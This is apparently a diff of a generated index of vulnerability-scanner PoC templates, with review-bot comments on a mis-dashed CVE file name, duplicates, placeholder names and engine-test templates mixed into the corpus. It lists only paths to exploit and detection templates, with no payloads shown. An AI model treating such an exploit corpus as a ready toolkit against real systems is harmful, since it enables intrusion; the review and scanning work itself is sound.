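Review bot: The added entry `+./poc/cve/CVE-2024–24142.yaml` writes the CVE identifier with a U+2013 en dash between the year and the sequence number, while every neighbouring CVE entry uses an ASCII hyphen. Anything that selects or deduplicates templates by matching `CVE-\d{4}-\d+` (tag filters, `-id` selection, cross-references to NVD) will not see this file, and a correctly named `CVE-2024-24142.yaml` could later land next to it as a silent duplicate. The fix belongs to the added file rather than to this generated index: rename it to `./poc/cve/CVE-2024-24142.yaml` and regenerate poc.txt, ideally with a CI check that rejects non-ASCII characters in `poc/cve/` file names. The lowercase `+./poc/cve/cve-2024-6966.yaml` in the following hunk has the same discoverability problem for case-sensitive matching, although it follows an existing lowercase cluster.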
@@ -53577,6 +53663,7 @@
 ./poc/default/jupyterhub-default-login-8400.yaml
 ./poc/default/jupyterhub-default-login-8401.yaml
 ./poc/default/jupyterhub-default-login.yaml
+./poc/default/k8s-default-namespace-used.yaml
 ./poc/default/kafka-center-default-login-8415.yaml
 ./poc/default/kafka-center-default-login-8416.yaml
 ./poc/default/kafka-center-default-login-8417.yaml
@@ -54378,6 +54465,7 @@
 ./poc/detect/cvsweb-detect.yaml
 ./poc/detect/cx-cloud-upload-detect-6766.yaml
 ./poc/detect/cx-cloud-upload-detect.yaml
+./poc/detect/cyberpanel-detect.yaml
 ./poc/detect/darkstat-detect-1.yaml
 ./poc/detect/darkstat-detect-2.yaml
 ./poc/detect/darkstat-detect-6767.yaml
@@ -54494,6 +54582,7 @@
 ./poc/detect/dnssec-detection-7051.yaml
 ./poc/detect/dnssec-detection.yaml
 ./poc/detect/docker-api-detection.yaml
+./poc/detect/docker-ports-detection.yaml
 ./poc/detect/dolibarr-detect-7069.yaml
 ./poc/detect/dolibarr-detect-7070.yaml
 ./poc/detect/dolibarr-detect-7071.yaml
@@ -54598,6 +54687,7 @@
 ./poc/detect/firebase-detect-7495.yaml
 ./poc/detect/firebase-detect-7496.yaml
 ./poc/detect/firebase-detect.yaml
+./poc/detect/flexmls-detect.yaml
 ./poc/detect/flink-version-detect.yaml
 ./poc/detect/flir-detect.yaml
 ./poc/detect/flowci-detection.yaml
@@ -54865,6 +54955,7 @@
 ./poc/detect/jsf-detection.yaml
 ./poc/detect/jspxcms-detect.yaml
 ./poc/detect/jwt-detection.yaml
+./poc/detect/kaseya-detect.yaml
 ./poc/detect/kavita-panel-detect.yaml
 ./poc/detect/kevinlab-device-detect-1.yaml
 ./poc/detect/kevinlab-device-detect-2.yaml
@@ -54923,6 +55014,7 @@
 ./poc/detect/linkerd-ssrf-detect-8640.yaml
 ./poc/detect/linkerd-ssrf-detect.yaml
 ./poc/detect/livehelperchat-detect.yaml
+./poc/detect/localai-detect.yaml
 ./poc/detect/log4j-detect.yaml
 ./poc/detect/log4j-rce-detect-waf-bypass.yaml
 ./poc/detect/log4jshell-detect.yaml
@@ -55195,6 +55287,7 @@
 ./poc/detect/pega-detect-9476.yaml
 ./poc/detect/pega-detect.yaml
 ./poc/detect/pexip-detect.yaml
+./poc/detect/pghero-detect.yaml
 ./poc/detect/pgsql-detect.yaml
 ./poc/detect/pgsql-version-detect.yaml
 ./poc/detect/php-detect.yaml
@@ -55931,6 +56024,7 @@
 ./poc/docker/docker-hub-login-check.yaml
 ./poc/docker/docker-k8s.yaml
 ./poc/docker/docker-misconfigured-api.yaml
+./poc/docker/docker-ports-detection.yaml
 ./poc/docker/docker-publish.yml
 ./poc/docker/docker-registry-7064.yaml
 ./poc/docker/docker-registry-7065.yaml
@@ -55967,6 +56061,9 @@
 ./poc/docker/exposed-docker-api.yaml
 ./poc/docker/exposed-dockerd.yaml
 ./poc/docker/flask-redis-docker.yaml
+./poc/docker/k8s-containers-share-host-ipc.yaml
+./poc/docker/k8s-privileged-container.yaml
+./poc/docker/k8s-root-container-admission.yaml
 ./poc/docker/kubernetes-allow-privilege-escalation-no-securitycontext.yaml
 ./poc/docker/kubernetes-api-detect.yaml
 ./poc/docker/kubernetes-dashboard-8526.yaml
@@ -57433,6 +57530,7 @@
 ./poc/extract/firebase-database-extractor.yaml
 ./poc/extract/headless-extract-values.yaml
 ./poc/extract/html-input-extractor.yaml
+./poc/extract/http-matcher-extractor-dy-extractor.yaml
 ./poc/extract/js-endpoint-extractor.yaml
 ./poc/extract/raw-dynamic-extractor.yaml
 ./poc/extract/stop-at-first-match-with-extractors.yaml
@@ -57476,6 +57574,7 @@
 ./poc/favicon/wpfavicon.yaml
 ./poc/ftp/Joomla-sqli-aceftp.yaml
 ./poc/ftp/Wordpress-MiwoFTP_Plugins-ArbitraryFileDownload.yaml
+./poc/ftp/allow-unencrypted-ftp.yaml
 ./poc/ftp/aws-sftp-detect.yaml
 ./poc/ftp/azure-nsg-ftp-unrestricted.yaml
 ./poc/ftp/crush-ftp-detect-1270.yaml
@@ -57501,6 +57600,7 @@
 ./poc/ftp/ftp-credentials-exposure.yaml
 ./poc/ftp/ftp-default-credentials.yaml
 ./poc/ftp/ftp-default-creds.yaml
+./poc/ftp/ftp-service-running.yaml
 ./poc/ftp/ftp-weak-credentials-7569.yaml
 ./poc/ftp/ftp-weak-credentials-7570.yaml
 ./poc/ftp/ftp-weak-credentials.yaml
@@ -57648,6 +57748,7 @@
 ./poc/fuzz/alfabet-param-fuzzer.yaml
 ./poc/fuzz/blind_xss_fuzz_param.yaml
 ./poc/fuzz/cache-poisoning-fuzz.yaml
+./poc/fuzz/fuzz-headless.yaml
 ./poc/fuzz/fuzz-mode.yaml
 ./poc/fuzz/fuzz-oauth.yaml
 ./poc/fuzz/fuzz-query.yaml
@@ -59064,6 +59165,7 @@
 ./poc/header/header_sqli.yaml
 ./poc/header/header_user_id.yaml
 ./poc/header/headless-header-action.yaml
+./poc/header/headless-header-status-test.yaml
 ./poc/header/hidden-data-in-headers.yaml
 ./poc/header/hidden-http-header-injection.yaml
 ./poc/header/host-header-auth-bypass.yaml
@@ -59191,6 +59293,7 @@
 ./poc/http/http-etcd-unauthenticated-api-data-leak-8056.yaml
 ./poc/http/http-etcd-unauthenticated-api-data-leak-8057.yaml
 ./poc/http/http-etcd-unauthenticated-api-data-leak.yaml
+./poc/http/http-get.yaml
 ./poc/http/http-headers-11c701ce2d0af62ea084b4889e52e678.yaml
 ./poc/http/http-headers-1874737efbe46f20a3df6785022a5d61.yaml
 ./poc/http/http-headers-48720a0f8d87c88aeb0fd970b4ee767f.yaml
@@ -59201,11 +59304,13 @@
 ./poc/http/http-https-remover-6e1ff52e2bc9789e2496baff0910e72a.yaml
 ./poc/http/http-https-remover-7c0d4499231fc232e325bb27484b40b7.yaml
 ./poc/http/http-https-remover.yaml
+./poc/http/http-matcher-extractor-dy-extractor.yaml
 ./poc/http/http-missing-security-headers-8058.yaml
 ./poc/http/http-missing-security-headers.yaml
 ./poc/http/http-multiple-matcher-condition.yaml
 ./poc/http/http-multiple-matcher.yaml
 ./poc/http/http-paths.yaml
+./poc/http/http-preprocessor.yaml
 ./poc/http/http-raw-multiple.yaml
 ./poc/http/http-raw.yaml
 ./poc/http/http-trace.yaml
@@ -59262,6 +59367,9 @@
 ./poc/http/mjniohttpdaemon.yaml
 ./poc/http/ms-mfc-httpsvr.yaml
 ./poc/http/muhttpd.yaml
+./poc/http/multi-http-var-sharing.yaml
+./poc/http/net-https-timeout.yaml
+./poc/http/net-https.yaml
 ./poc/http/nhttpd-cve-2019-16278.yaml
 ./poc/http/nhttpd-cve-2019-16278.yml
 ./poc/http/oracle-http-server-12c-9381.yaml
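Review bot: `+./poc/http/http-matcher-extractor-dy-extractor.yaml` is the second copy of a file name this same commit adds under `./poc/extract/`, so a runner pointed at the whole `poc/` tree may load both and probe each target twice for one check (that the two files are identical is inferred from the name only; a checksum comparison would settle it). Several other additions in these hunks — `http-get.yaml`, `http-preprocessor.yaml`, `multi-http-var-sharing.yaml`, `net-https.yaml`, `net-https-timeout.yaml` — carry the names of nuclei's own engine integration tests rather than vulnerability checks, and if that is what they are they generate requests against production targets without ever producing a finding. I would keep a single copy of each duplicate and exclude engine-test templates from the index, for example with a name or `tags:` filter in the script that regenerates poc.txt, rather than hand-editing this generated file.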
@@ -60511,6 +60619,7 @@
 ./poc/javascript/nextjs-cve-2020-5284.yaml
 ./poc/javascript/nextjs-redirect.yaml
 ./poc/javascript/nextjs.yaml
+./poc/javascript/nodejs-framework-exceptions.yaml
 ./poc/javascript/npm-cli-metrics-json.yaml
 ./poc/javascript/npm-package-lock-json.yaml
 ./poc/javascript/npmjs.yaml
@@ -63252,6 +63361,7 @@
 ./poc/microsoft/smartbi-db2-params-rce.yaml
 ./poc/microsoft/sms-alert-5a8aefff0a385c6f546517b576852be5.yaml
 ./poc/microsoft/sms-alert-ab1be4761d5f0b013fb19c3dff7678eb.yaml
+./poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml
 ./poc/microsoft/sms-alert.yaml
 ./poc/microsoft/sms-installer.yaml
 ./poc/microsoft/sms-ovh-6f857d605e5fcd96f0cfbefd07106552.yaml
@@ -63949,6 +64059,7 @@
 ./poc/nodejs/node-red.yaml
 ./poc/nodejs/nodebb-installer.yaml
 ./poc/nodejs/nodebb.yaml
+./poc/nodejs/nodejs-framework-exceptions.yaml
 ./poc/nodejs/nodered-default-login.yaml
 ./poc/nodejs/npm-access-token.yaml
 ./poc/nodejs/npm-accesstoken.yaml
@@ -76975,6 +77086,7 @@
 ./poc/other/a-staff-76c6b84ccd9f6bd60eada03675ff7bce.yaml
 ./poc/other/a-staff-b7c5fef4e19b4435bd19c7ddc442fdea.yaml
 ./poc/other/a-staff.yaml
+./poc/other/a.yaml
 ./poc/other/a3-lazy-load-01e0339e4ed3a9879c77323cb875b088.yaml
 ./poc/other/a3-lazy-load-057a58dc3f044062ffd706f090536b9b.yaml
 ./poc/other/a3-lazy-load-299b0bf2827a81adc4c48415e4b30c25.yaml
@@ -77025,6 +77137,7 @@
 ./poc/other/a8_status_bypass.yaml
 ./poc/other/aa-calculator-64eaa613ea8e0f06d31971ba4e3fe6a7.yaml
 ./poc/other/aa-calculator.yaml
+./poc/other/aaaa.yaml
 ./poc/other/aaha-chat.yaml
 ./poc/other/aajoda-testimonials-0c2f42e4ed4943c148a085a995d351f5.yaml
 ./poc/other/aajoda-testimonials.yaml
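Review bot: `+./poc/other/a.yaml` and `+./poc/other/aaaa.yaml` are placeholder names that say nothing about what the template probes, and they land in the catch-all `other/` directory where nothing else helps a reader or a tag filter identify them. In the same line, `+./poc/javascript/nodejs-framework-exceptions.yaml` and `+./poc/nodejs/nodejs-framework-exceptions.yaml` add one file name under two directories, which means two copies to keep in sync and, if the contents match (inferred from the name only), a second run of the same check against every target. I would rename the two placeholders after their `id:`/`name:` fields and keep a single copy of the duplicate; since poc.txt is regenerated from the tree, the index follows on its own.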
@@ -78102,6 +78215,7 @@
 ./poc/other/affiliate-toolkit-starter-a3f3e9cd8c92ca6bacbb8782a0b184d8.yaml
 ./poc/other/affiliate-toolkit-starter-aedad06672a5fe07e1a19e3cff437cf5.yaml
 ./poc/other/affiliate-toolkit-starter-dd1e988dd21e3ac940566e955d9ce37b.yaml
+./poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml
 ./poc/other/affiliate-toolkit-starter-fd95f4b7f3e1c765b00cff7d7f780bd1.yaml
 ./poc/other/affiliate-toolkit-starter.yaml
 ./poc/other/affiliatebooster-blocks-e6d93b96c11e4a3efeb7abe59cdac85e.yaml
@@ -78505,6 +78619,7 @@
 ./poc/other/allow-cleartext-traffic.yaml
 ./poc/other/allow-svg-d699bbd1d441305fdcaa85c39ab88bb0.yaml
 ./poc/other/allow-svg.yaml
+./poc/other/allow-untrusted-certificates.yaml
 ./poc/other/alltuts-1366c78d24a6434e6c80bc8524f1d146.yaml
 ./poc/other/alltuts-21bafad41e0ca9a1483df7dfbb454ba7.yaml
 ./poc/other/alltuts-31eb77eaefc61e112478e9f1952e822d.yaml
@@ -78783,6 +78898,8 @@
 ./poc/other/anonup.yaml
 ./poc/other/anonymous-restricted-content-a1c228113f48faf98c264ba16b96c84a.yaml
 ./poc/other/anonymous-restricted-content.yaml
+./poc/other/anonymous-sam-enumeration-enabled.yaml
+./poc/other/anonymous-sid-enumeration-enabled.yaml
 ./poc/other/ansible-semaphore-panel-327.yaml
 ./poc/other/ansible-semaphore-panel-328.yaml
 ./poc/other/ansible-semaphore-panel.yaml
@@ -79071,6 +79188,7 @@
 ./poc/other/arconix-faq.yaml
 ./poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml
 ./poc/other/arconix-shortcodes-7a41a1e084cd2f3ac351e8264449d771.yaml
+./poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml
 ./poc/other/arconix-shortcodes-f5f9ec1a66da2f65afef7cacfc25a1c0.yaml
 ./poc/other/arconix-shortcodes.yaml
 ./poc/other/arcserve-panel.yaml
@@ -79259,6 +79377,7 @@
 ./poc/other/asp168-oho.yaml
 ./poc/other/aspect-control-panel.yaml
 ./poc/other/aspentech-aspen-infoplus21.yaml
+./poc/other/aspnet-framework-exceptions.yaml
 ./poc/other/aspnet-mvc.yaml
 ./poc/other/aspnet-requestvalidationmode.yaml
 ./poc/other/aspose-cloud-ebook-generator-294ba58c1e6acec80965380b0e0e073c.yaml
@@ -79459,6 +79578,8 @@
 ./poc/other/audio.yaml
 ./poc/other/audiobookshelf-panel.yaml
 ./poc/other/audiojungle.yaml
+./poc/other/audit-logging-disabled.yaml
+./poc/other/audit-logs-not-archived.yaml
 ./poc/other/audit.yaml
 ./poc/other/audit.yml
 ./poc/other/augmented-reality-1c6032510cc675f4443ed5957cd5ebf8.yaml
@@ -79497,6 +79618,7 @@
 ./poc/other/auto-limit-posts-reloaded-55cbc2cb09e1fd50fee7e356fb4b87d9.yaml
 ./poc/other/auto-limit-posts-reloaded.yaml
 ./poc/other/auto-listings.yaml
+./poc/other/auto-logon-enabled.yaml
 ./poc/other/auto-more-tag-61c212905e116f724d2f8c95ddab517b.yaml
 ./poc/other/auto-more-tag.yaml
 ./poc/other/auto-post-thumbnail-30d1ac5b32e1bde93d37b494d16d1e50.yaml
@@ -79545,6 +79667,7 @@
 ./poc/other/automatic-post-categories.yaml
 ./poc/other/automatic-user-roles-switcher-8b5505f4e63bd8c042be8593732ad583.yaml
 ./poc/other/automatic-user-roles-switcher.yaml
+./poc/other/automatic-windows-updates-disabled.yaml
 ./poc/other/automatic-youtube-gallery-3ecc29bc027c0dadec1c48ed62e636d7.yaml
 ./poc/other/automatic-youtube-gallery-692fd342ca471e67560e976ed10efa16.yaml
 ./poc/other/automatic-youtube-gallery.yaml
@@ -79557,6 +79680,7 @@
 ./poc/other/automation-direct.yaml
 ./poc/other/automation_360.yaml
 ./poc/other/automatisch-panel.yaml
+./poc/other/autoplay-removable-media-enabled.yaml
 ./poc/other/autoptimize-1cd3f0584531536972eeaec5bd981bf9.yaml
 ./poc/other/autoptimize-2ecfdf7e957d875bca93a4c9bd866fc9.yaml
 ./poc/other/autoptimize-44a1c78b812ff3de72de546c19550b76.yaml
@@ -79579,6 +79703,7 @@
 ./poc/other/autoresponder-gwa-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/autoresponder-gwa-plugin.yaml
 ./poc/other/autoresponder-gwa.yaml
+./poc/other/autorun-scripts-startup-folder.yaml
 ./poc/other/autosave-net-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/autosave-net-ff9293ba28748efa2ab9a2fe77385468.yaml
 ./poc/other/autosave-net-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -80127,6 +80252,7 @@
 ./poc/other/beaver-builder-lite-version-5b42cfef5da69a9668244c9c487eca3c.yaml
 ./poc/other/beaver-builder-lite-version-61ae33d7c990a629b171160654bc6e2e.yaml
 ./poc/other/beaver-builder-lite-version-6229d60925190e54ee6d1e7dfb1b109a.yaml
+./poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml
 ./poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml
 ./poc/other/beaver-builder-lite-version-8fb79d694642d9144754619ceddfad1c.yaml
 ./poc/other/beaver-builder-lite-version-9031f2623733acade8c80c6f38217e78.yaml
@@ -82892,6 +83018,7 @@
 ./poc/other/cname-fingerprint.yaml
 ./poc/other/cname-provider-assessment.yaml
 ./poc/other/cname-service.yaml
+./poc/other/cname.yaml
 ./poc/other/cnet.yaml
 ./poc/other/cnoa-oa.yaml
 ./poc/other/cnpower-oa.yaml
@@ -82950,6 +83077,9 @@
 ./poc/other/code-snippets-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/code-snippets-plugin.yaml
 ./poc/other/code-snippets.yaml
+./poc/other/code-template-1.yaml
+./poc/other/code-template-2.yaml
+./poc/other/code-value-share-workflow.yaml
 ./poc/other/code42-panel.yaml
 ./poc/other/codeberg.yaml
 ./poc/other/codecademy.yaml
@@ -83252,6 +83382,7 @@
 ./poc/other/complete-gallery-manager.yaml
 ./poc/other/complete-open-graph-6519feb88108a3aa2842460ecf7f8889.yaml
 ./poc/other/complete-open-graph.yaml
+./poc/other/complex-conditions.yaml
 ./poc/other/complianz-gdpr-108d0a02108af71158dae68a81c5757c.yaml
 ./poc/other/complianz-gdpr-16022b20d3dcb407f1909f705bc37713.yaml
 ./poc/other/complianz-gdpr-2d5670a5dd8a4ab1e33992b33ecf5dfe.yaml
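Review bot: `+./poc/other/code-template-1.yaml`, `+./poc/other/code-template-2.yaml` and `+./poc/other/code-value-share-workflow.yaml` carry the names of nuclei's `code`-protocol integration tests; if that is what they are, each one runs a shell or interpreter snippet on the scanning host instead of sending a probe to a target. Indexing them beside PoCs means anyone who runs this corpus with code templates enabled executes whatever those files contain, so their `code:` blocks should be read before they ship, and the index generator should probably drop engine-test templates altogether. `cname.yaml` and `complex-conditions.yaml` in the neighbouring hunks look like the same category, and names such as `code-template-*` are too generic for the catch-all `other/` directory in any case. All of this is inferred from file names only; poc.txt does not show the template bodies.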
@@ -83310,6 +83441,7 @@
 ./poc/other/concrete5-panel-1172.yaml
 ./poc/other/concrete5-panel-1173.yaml
 ./poc/other/concrete5-panel.yaml
+./poc/other/conditional-flow.yaml
 ./poc/other/conditional-menus.yaml
 ./poc/other/coneblog-widgets-bc060695098fbf1df6eb67d564047f66.yaml
 ./poc/other/coneblog-widgets-ec4fe1cabb457f15256813e0e7ad1522.yaml
@@ -85191,6 +85323,7 @@
 ./poc/other/disable-image-right-click-09712df89f849ba85b08f5f0deb0865b.yaml
 ./poc/other/disable-image-right-click.yaml
 ./poc/other/disable-pad-service.yaml
+./poc/other/disable-path-automerge.yaml
 ./poc/other/disable-update-notifications-8ee51f427b6ac5677236482a75c41622.yaml
 ./poc/other/disable-update-notifications.yaml
 ./poc/other/disabledrocks-mastodon-instance.yaml
@@ -85223,6 +85356,7 @@
 ./poc/other/display-admin-page-on-frontend.yaml
 ./poc/other/display-custom-post-aa757b5702d208e7dc541f210bf378bd.yaml
 ./poc/other/display-custom-post.yaml
+./poc/other/display-last-username-enabled.yaml
 ./poc/other/display-medium-posts-401d7bc9b676ef7419913f7165176129.yaml
 ./poc/other/display-medium-posts.yaml
 ./poc/other/display-metadata-b28114b5979504523967bcc431ea65ea.yaml
@@ -85323,6 +85457,7 @@
 ./poc/other/dns-320_firmware.yaml
 ./poc/other/dns-320l.yaml
 ./poc/other/dns-multiple-example.yaml
+./poc/other/dns-ns-probe.yaml
 ./poc/other/dns-value-share-template-3.yaml
 ./poc/other/doc.yml
 ./poc/other/docebo-elearning-panel.yaml
@@ -85600,6 +85735,7 @@
 ./poc/other/download-shortcode.yaml
 ./poc/other/download-theme-e45971e156997d8c7d2b6559578b139e.yaml
 ./poc/other/download-theme.yaml
+./poc/other/download-unsigned-activex-allowed.yaml
 ./poc/other/download-zip-attachments-c19574fadacaf2b4beb86feecc53bb8f.yaml
 ./poc/other/download-zip-attachments.yaml
 ./poc/other/download_any_file.yaml
@@ -87407,6 +87543,7 @@
 ./poc/other/eureka-server.yaml
 ./poc/other/eusestudy.yaml
 ./poc/other/evaluate-04eec8ce4ae8f89c6df8d530479c7189.yaml
+./poc/other/evaluate-variables.yaml
 ./poc/other/evaluate.yaml
 ./poc/other/evarisk-371811fcd6d1fa9c8ade9c404e2f3d94.yaml
 ./poc/other/evarisk-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -87731,6 +87868,7 @@
 ./poc/other/exclusive-addons-for-elementor-8b5117829a5837670e10088058260249.yaml
 ./poc/other/exclusive-addons-for-elementor-9232d1d5b380e1fb660f57382e4f5956.yaml
 ./poc/other/exclusive-addons-for-elementor-a42237150a7b86a7d66cdff228d7a407.yaml
+./poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml
 ./poc/other/exclusive-addons-for-elementor-aa36477eab476e17cbcabf7d3a68b95d.yaml
 ./poc/other/exclusive-addons-for-elementor-b22002f853e25973049d1d1881d3b198.yaml
 ./poc/other/exclusive-addons-for-elementor-b3bcca96e1c875ed49e977324ed1d1bf.yaml
@@ -87852,6 +87990,7 @@
 ./poc/other/export-users-to-csv.yaml
 ./poc/other/export-users.yaml
 ./poc/other/exported-activities.yaml
+./poc/other/exported-response-vars.yaml
 ./poc/other/exports-and-reports-94039fda9d0f7d44d90111c7b7a1acdc.yaml
 ./poc/other/exports-and-reports.yaml
 ./poc/other/expose-56a69c984e02d7b046a1210573165bd4.yaml
@@ -88326,6 +88465,7 @@
 ./poc/other/filemaker.yaml
 ./poc/other/filemakerpro.yaml
 ./poc/other/filenice.yaml
+./poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml
 ./poc/other/fileorganizer-7bc8d0bd12af84611e3b51967c2247fa.yaml
 ./poc/other/fileorganizer-ffbed6540cd0ed660ed2118f5ce9a483.yaml
 ./poc/other/fileorganizer.yaml
@@ -88678,6 +88818,7 @@
 ./poc/other/floating-tweets.yaml
 ./poc/other/flog-20118fea81b5361eadc12e13766b8d59.yaml
 ./poc/other/flog.yaml
+./poc/other/flow-hide-matcher.yaml
 ./poc/other/flowci-panel.yaml
 ./poc/other/flowcode.yaml
 ./poc/other/flower-celery-monitoring-tool.yaml
@@ -89822,6 +89963,7 @@ ./poc/other/get-directions.yaml ./poc/other/get-env(1).yaml ./poc/other/get-env.yaml +./poc/other/get-hotfix.yaml ./poc/other/get-iam-users.yaml ./poc/other/get-override-sni.yaml ./poc/other/get-query-string.yaml @@ -90430,6 +90572,7 @@ ./poc/other/guardgiant.yaml ./poc/other/gucherry-blog-e13b070536bec06d15a834eb59d2fbcb.yaml ./poc/other/gucherry-blog.yaml +./poc/other/guest-account-enabled.yaml ./poc/other/guestofy-restaurant-reservations-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/guestofy-restaurant-reservations-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/guestofy-restaurant-reservations-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -90660,9 +90803,12 @@ ./poc/other/hdw-tube-9100e4d231772ba56c0f695e35e4a42d.yaml ./poc/other/hdw-tube.yaml ./poc/other/hdwiki.yaml +./poc/other/headless-1.yaml ./poc/other/headless-basic.yaml ./poc/other/headless-payloads.yaml ./poc/other/headless-reflected-pitchfork.yaml +./poc/other/headless-self-contained.yaml +./poc/other/headless-waitevent.yaml ./poc/other/headline-analyzer-9cfd0508d6a9c79dfc8e808ca55da66f.yaml ./poc/other/headline-analyzer.yaml ./poc/other/headway-b54840b9c0da3f7fd9c41b07df4e5943.yaml @@ -91355,6 +91501,7 @@ ./poc/other/identityguard-selfservice-entrust-8142.yaml ./poc/other/identityguard-selfservice-entrust-8143.yaml ./poc/other/identityguard-selfservice-entrust.yaml +./poc/other/idle-timeout-Interval.yaml ./poc/other/idonate-1ace5675b1d0e0c2c55b706529d8c6a1.yaml ./poc/other/idonate.yaml ./poc/other/idpay-contact-form-7-e3b0819e93c2e92645175f698a388c69.yaml @@ -91873,6 +92020,7 @@ ./poc/other/inquiry-cart.yaml ./poc/other/insanejournal.yaml ./poc/other/insecure-broadcast-receiver.yaml +./poc/other/insecure-cipher-suites-enabled.yaml ./poc/other/insecure-content-warning-6c90b20a33edd819f7562bd7a9738958.yaml ./poc/other/insecure-content-warning.yaml ./poc/other/insecure-data-storage.yaml 
@@ -92038,6 +92186,7 @@ ./poc/other/interactive-world-maps-fcdf26721454bc7cbb87f06418e98ace.yaml ./poc/other/interactive-world-maps.yaml ./poc/other/interactivevirtualshipdisplaysystem.yaml +./poc/other/interactsh-requests-mc-and.yaml ./poc/other/interactsh-server-8165.yaml ./poc/other/interactsh-server.yaml ./poc/other/interactsh-stop-at-first-match.yaml @@ -92256,6 +92405,7 @@ ./poc/other/itchio.yaml ./poc/other/itenable.yaml ./poc/other/iterable.yaml +./poc/other/iterate-one-value-flow.yaml ./poc/other/ithemeland-bulk-posts-editing-lite.yaml ./poc/other/ithemelandco-woo-report-3ead2ac6f8a1104bbcbbe99a51622308.yaml ./poc/other/ithemelandco-woo-report.yaml @@ -92768,6 +92918,25 @@ ./poc/other/justified-image-grid.yaml ./poc/other/jxt-consulting.yaml ./poc/other/jymusic.yaml +./poc/other/k8s-allow-privilege-escalation-set.yaml +./poc/other/k8s-cpu-limits-not-set.yaml +./poc/other/k8s-cpu-requests-not-set.yaml +./poc/other/k8s-host-network-namespace-shared.yaml +./poc/other/k8s-host-pid-namespace-sharing.yaml +./poc/other/k8s-host-ports-check.yaml +./poc/other/k8s-image-pull-policy-always.yaml +./poc/other/k8s-image-tag-not-fixed.yaml +./poc/other/k8s-memory-limits-not-set.yaml +./poc/other/k8s-memory-requests-not-set.yaml +./poc/other/k8s-minimize-added-capabilities.yaml +./poc/other/k8s-netpol-egress-rules.yaml +./poc/other/k8s-netpol-namespace.yaml +./poc/other/k8s-network-ingress-rules.yaml +./poc/other/k8s-readiness-probe-not-set.yaml +./poc/other/k8s-readonly-fs.yaml +./poc/other/k8s-readonly-rootfs.yaml +./poc/other/k8s-root-user-id.yaml +./poc/other/k8s-seccomp-profile-set.yaml ./poc/other/kadence-blocks-16166425b66ab654e6c5785538325240.yaml ./poc/other/kadence-blocks-18a42b214d398c8d7d69290d164a5fb5.yaml ./poc/other/kadence-blocks-241c6c10a313398faffdf21714d7ccca.yaml 
@@ -92833,6 +93002,7 @@ ./poc/other/kaswara-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/kaswara-plugin.yaml ./poc/other/kaswara.yaml +./poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml ./poc/other/kathmag-236bed5b5a49a6173251e991d6ca44d1.yaml ./poc/other/kathmag-d2a46afd6d61289094ec49e6cf79a7c7.yaml ./poc/other/kathmag.yaml @@ -93466,9 +93636,11 @@ ./poc/other/learn-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/learn-manager-plugin.yaml ./poc/other/learn-manager.yaml +./poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml ./poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml ./poc/other/learning-management-system-6c0e04cbc2da4388f81a8caa6d6b8191.yaml ./poc/other/learning-management-system-7c31e6671c937327ff1564eccbf43be8.yaml +./poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml ./poc/other/learning-management-system-d39d6c1f84e5236c7d49d1e68072221d.yaml ./poc/other/learning-management-system-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/learning-management-system-fa2ccc72a92978caad1b961487785ac8.yaml @@ -93886,6 +94058,8 @@ ./poc/other/liveview-axis-camera.yaml ./poc/other/livezilla.yaml ./poc/other/lkpoweroa.yaml +./poc/other/llmnr-disabled.yaml +./poc/other/lm-hash-storage-enabled.yaml ./poc/other/lnmp.yaml ./poc/other/loading-page-703919aaf3ac5207e458fe86bf1026b0.yaml ./poc/other/loading-page.yaml @@ -94794,8 +94968,11 @@ ./poc/other/mastown-mastodon-instance.yaml ./poc/other/match-1.yaml ./poc/other/match-2.yaml +./poc/other/match-3.yaml ./poc/other/matcher-name.yaml +./poc/other/matcher-status.yaml ./poc/other/matcher-with-and.yaml +./poc/other/matcher-with-nested-and.yaml ./poc/other/matcher-with-or.yaml ./poc/other/material-design-for-contact-form-7-597cb0aecccef3143168fab5a0d89442.yaml ./poc/other/material-design-for-contact-form-7.yaml 
@@ -95877,6 +96054,7 @@ ./poc/other/multi-rating-cc792d8a685645d918ffa1ca3b54f7dc.yaml ./poc/other/multi-rating-fee6d305d8448a1b6afd09f68f9ab4ff.yaml ./poc/other/multi-rating.yaml +./poc/other/multi-request.yaml ./poc/other/multi-scheduler-7c0587b156a0100b0a9665a34fd1f7ed.yaml ./poc/other/multi-scheduler.yaml ./poc/other/multi-sslvpn-gateway.yaml @@ -95902,6 +96080,8 @@ ./poc/other/multilist-subscribe-for-sendy-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/other/multilist-subscribe-for-sendy-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/multilist-subscribe-for-sendy.yaml +./poc/other/multimatch-value-share-template.yaml +./poc/other/multimatch-value-share-workflow.yaml ./poc/other/multimedial-images.yaml ./poc/other/multiplayer-plugin-bf5a6246079c80944f63d6f8406a09f9.yaml ./poc/other/multiplayer-plugin.yaml @@ -95929,6 +96109,10 @@ ./poc/other/multiple-roles-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/multiple-roles-plugin.yaml ./poc/other/multiple-roles.yaml +./poc/other/multiproto.yaml +./poc/other/multiprotocol-value-share-template.yaml +./poc/other/multiprotodynamic.yaml +./poc/other/multiprotowithprefix.yaml 